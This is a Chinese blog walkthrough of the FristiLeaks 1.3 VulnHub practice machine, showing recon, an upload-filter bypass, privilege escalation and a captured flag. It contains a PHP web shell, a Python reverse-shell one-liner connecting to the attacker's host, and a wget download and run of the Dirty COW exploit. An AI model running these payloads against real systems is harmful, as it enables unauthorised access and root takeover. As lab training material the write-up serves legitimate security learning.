FristiLeaks: 1.3

于 2024-10-08 15:19:32 发布
阅读量686 收藏 25
点赞数 14
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74214882/article/details/142760730
版权

0x01 项目地址

FristiLeaks: 1.3

0x02 靶机描述

Goal: get root (uid 0) and read the flag file

目标:获取root(uid 0)并读取flag文件

VMware users will need to manually edit the VM's MAC address to: 08:00:27:A5:A6:76

VMware用户需要手动将虚拟机的MAC地址编辑为:08:00:27:A5:A6:76

0x03 环境搭建

靶机

FristiLeaks: 1.3

NAT模式 192.168.6.158

攻击机

kali

NAT模式 192.168.6.128

根据描述,将靶机mac地址改为:08:00:27:A5:A6:76

0x04 详细步骤

1.主机发现

arp-scan -l

2.端口扫描

nmap -p- 192.168.6.158

只开放了80端口

3.目录扫描

dirsearch -u "http://192.168.6.158" -e *

4.Web访问

浏览器访问192.168.6.158,貌似没什么东西,再看一下目录扫描扫出来的页面

http://192.168.6.158/robots.txt

这儿记录了三条数据,分别拼接到url路径上访问一下看看

http://192.168.6.158/cola
http://192.168.6.158/sisi
http://192.168.6.158/beer

三个路径访问结果都是同一张图片

5.漏洞挖掘

通过照片上的提示This is not the url,我们可以大概猜测到是想让我们寻找url链接或路径,再次回到首页,看看有没有什么有用的线索

根据页面上的大字KEEP CALM AND DRINK FRISTI->保持冷静,先喝酒,还有刚才访问的三个页面路径都是喝的,那我们尝试将fristi作为路径进行访问

http://192.168.6.158/fristi/

发现一个登录页面

遇到登录页面,尝试弱口令、暴力破解还有SQL注入都没有成功,F12查看源码时有所发现,这而记录了一份用户eezeepz写的内容,下边还有一长串base64加密后的密文,接下来去kali中对密文进行base64解码

iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==

先将密文写进1.txt

vim 1.txt

然后开始解密

base64 -d 1.txt > 2.txt
cat 2.txt

解密后显示PNG,联想到可能得解密成PNG文件

base64 -d 1.txt > 1.png

解密成功,得到一串字符

keKkeKKeKKeKkEkkEk

猜测这串字符可能是密码,配合刚才得到的用户名可以登录,尝试一下登录

eezeepz : keKkeKKeKKeKkEkkEk

登录成功

发现可以上传文件

走到这一步,猜测大概率是一个文件上传漏洞,我们传一个php文件验证一下

# phpinfo.php
<?php phpinfo();?>

开始上传

上传失败,被拦截了

通过插件Wappalyzer可以看到是Apache服务器,我们利用Apache解析漏洞来尝试绕过

将文件后缀名改为.php.gif尝试一下绕过

可以看到绕过成功,文件被上传到了/uploads目录,确认存在文件上传漏洞

6.漏洞利用

上传一句话木马尝试执行系统命令

# shell.php.gif
<?php @system($_POST[cmd]);?>

文件上传成功

接下来尝试反弹shell,反弹到kali4444端口,kali开启监听

nc -lvnp 4444

使用浏览器插件hackbar来进行post传参

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.6.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

kali成功接收到反弹shell

7.权限提升

先查看一下eezeepz用户家目录下有什么文件

cd /home/eezeepz
ls -al

在众多文件中,看到一个notes.txt,我们来查看一下

cat notes.txt

一段英文,翻译一下

总的来说,这段话的大致意思是我们可以按照要求来运行一些admin权限的命令

那我们按照要求来尝试一下

echo '/home/admin/chmod -R 777 /home/admin/' > /tmp/runthis
ls /tmp

发现生成了cronresut文件

查看一下权限

ls -al /home

可以看到admin的权限变为了777

接下来进去看看

cd /home/admin
ls

这里除了几个命令之外,有两个python脚本和两个txt文件,通过查看发现txt文件里的内容是经过加密的,那python脚本可能是加密代码,通过加密代码写一个解密脚本

# whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
# cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
# 1.py
import base64,codecs,sys

def decodeString(str):
    base64string= codecs.decode(str,'rot13')
    return base64.b64decode(base64string[::-1])

cryptoResult=decodeString(sys.argv[1])
print(cryptoResult)

LetThereBeFristi!
thisisalsopw123

猜测这两个可能是密码,尝试切换用户登录

ls /home

尝试切换用户

su fristigod 
password:LetThereBeFristi!

登录成功!

接下来提权

一、sudo提权

sudo -l
/var/fristigod/.secret_admin_stuff/doCom
cd /var
cd fristigod
cd .secret_admin_stuff
./doCom
sudo -u fristi ./doCom
sudo -u fristi ./doCom /bin/bash -p
whoami
cd /root
ls
cat fristileaks_secrets.txt

拿到flag

Flag: Y0u_kn0w_y0u_l0ve_fr1st1

二、脏牛提权

脏牛网址firefart/dirtycow: Dirty Cow exploit - CVE-2016-5195 (github.com)

wget下载脏牛脚本,并赋权

wget http://192.168.30.182/dirty.c
chmod 777 dirty.c

编译运行

gcc -pthread dirty.c -o dirty -lcrypt
./dirty 123456

切换firefart用户,成功提权

查看flag:

cd ~
cat fristileaks_secrets.txt

mouyu⇔
关注
FristiLeaks_1.3#攻略
qq_27466929的博客
09-21 1148
FristiLeaks_1.3#攻略
【vulnhub】---FristiLeaks_1.3靶机
qq_43168364的博客
08-22 1033
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:FristiLeaks: 1.3靶机(192.168.15.155) 攻击机:kali Linux(192.168.15.129) 相关设置 根据官网的提示这里需要给靶机设置MAC地址 设置好了之后就可以开心的玩耍了。 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:arp-scan -l 命令:netdiscover -i eth0 -r
data: image/png; base64 用法详解 ( 作用,语法,优缺点 )
热门推荐
weixin_50339217的博客
01-29 11万+
大家可能注意到了,网页上有些图片的 src 或 css 背景图片的 url 后面跟了一大串字符,如: background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAAkCAYAAABIdFAMAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAHhJREFUeNo8zjsOxCAMBFB/KEAUFFR0Cbng3nQPw68ArZdAlOZppPFIBhH5EAB8b
data:image/png;base64的用法
qq_48666244的博客
05-23 8384
Data URI scheme是在RFC2397中定义的,目的是将一些小的数据,直接嵌入到网页中,从而不用再从外部文件载入。比如上面那串字符,其实是一张小图片,将这些字符复制黏贴到火狐的地址栏中并跳转,就能看到它了,一张1X36的白灰png图片。在上面的Data URI中,data表示取得数据的协定名称,image/png是数据类型名称,base64是数据的编码方法,逗号后面就是这个 image/png文件base64编码后的数据。base64,base64编码的png图片数据。data:,文本数据。
【小方法】python爬取base64网络图片
wangzhuanjia的博客
05-27 3154
问题场景: 这种图片地址类型,如果用request直接去请求是得不到二进制数据的。 这种需求还是比较常见的,我每次都是去百度,在csdn中去找,这次记录下来,以后也方便自己。 代码解析: import base64 import re def analysis_base64(src): result = re.search("data:image/(?P<ext>.*?);base64,(?P<data>.*)", src, re.DOTALL) if resul
data:image/png;base64 如何将自己的图片生成Base64编码
steve_sjf的博客
10-18 3万+
看到图片是这样一串码: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAA8AAAAMCAYAAAC9QufkAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAELSURBVChTdZKxTgJREEUXgomEWFnQGxsa9R+Qwk8wobCzh...
【爬虫】data: image/png; base64图片数据
最新发布
想当运维的程序猿
10-16 4889
URI表示统一资源标识符uniform resource identifier,字符串表示的是经过base64编码的图片数据。经过查阅资料发现,data:image/png;base64, 字符串…爬wx小程序时遇到了响应返回下面的信息。通常遇到的图片是如下形式,称为。
靶机渗透(六)FristiLeaks
qq_42180996的博客
04-30 1649
靶机FristiLeaks 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页 2.目录扫描(dirb) 3.浏览目录 4.Keep calm and drink fristi ...
靶场渗透(四)——FristiLeaks渗透
Ramona的博客
08-07 786
测试环境 靶机:firstiLeaks打开虚拟机后设为nat模式,更改mac地址为08:00:27:A5:A6:76 攻击机:kali,windows10 信息收集 • Netdiscover搜索主机位置(nmap也可以) Netdiscover –r 192.168.111.0/24 获取到靶机ip为192.168.111.137 • masscan(nmap)端口扫描 ma...
靶机渗透测试实战(七)——FristiLeaks渗透实战
橘子女侠
05-11 3987
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 查看靶机页面,IP地址为:192.168.37.146; 3. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80...
Data URI scheme(转)
weixin_30363509的博客
01-20 468
大家可能注意到了,网页上有些图片的src或css背景图片的url后面跟了一大串字符,比如: 1 2 3 4 5 6 7 background-image:url(data:image/png;base64, iVBORw0KGgoAAAANSUhEUgAAAAEAAAAkCAYAAABIdFAMAAAAGXR FWHRTb2Z0d2FyZQBBZ...
python保存base64图片
weixin_42039715的博客
12-08 3367
【代码】python保存base64图片。
data:image/png;base64 ?一道关于Data URI Scheme的入门级CTF_Web题
Art_Dillon
03-13 2万+
这是偶尔遇到的某网安交流群的入群题,题目没有任何的提示,直接给了一个txt文件。data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAANw AAAAoCAIAAAA...
网页上有些图片的src或css背景图片的url后面跟了一大串字符 data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAA...
weixin_30713953的博客
04-10 2万+
<!DOCTYPE html> <html dir="ltr" lang="en-US">   <!-- BEGIN head -->   <head>   <style>     #ccc{       background: url("data:image/png;base64,iVBORw0KGgoAAAA...
图片信息用浏览器显示:data:image/png;base64,+图片内容
爱的叹息的专栏
07-18 3万+
图片信息用浏览器显示:data:image/png;base64,+图片内容
Nodejs接收图片base64格式保存为文件
feng的博客
05-03 7956
base64的形式为“data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0。。。。”; 当接收到上边的内容后,需要将data:image/png;base64,这段内容过滤掉,过滤成:“iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0。。。”;然后进行保存。 app....
uniapp中base64转图片格式
weixin_42317757的博客
05-31 9036
在Uniapp中,可以使用uni.base64ToArrayBuffer() API将base64字符串转换为ArrayBuffer格式,然后将其转换为Blob对象。接着可以使用URL.createObjectURL()方法创建Blob URL,最终将其显示在页面上。
kernel: iwlwifi 0000:04:00.0: Direct firmware load for iwlwifi-7260-13.ucode failed with error -2
黄金乡
06-13 4781
kernel: iwlwifi 0000:04:00.0: Direct firmware load for iwlwifi-7260-13.ucode failed with error -2升级到 linux kernel 4.1-rc6 之后,dmesg出现了这个错误ERROR。并且Intel 7260D有时候会无法使用(wpa_supplicant却显示连接正常的bug)搜了下内核代码里面的
OSCP渗透测试实战:VulnHub精选漏洞机器
此外,还有其他虚拟机如FristiLeaks 1.3、Stapler 1、VulnOS 2、SickOs 1.2等,它们涵盖了不同的主题,比如文件系统漏洞、Web应用漏洞以及恶意软件分析等。 HackLAB: Vulnix提供了另一个平台,让学习者在真实的黑客...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值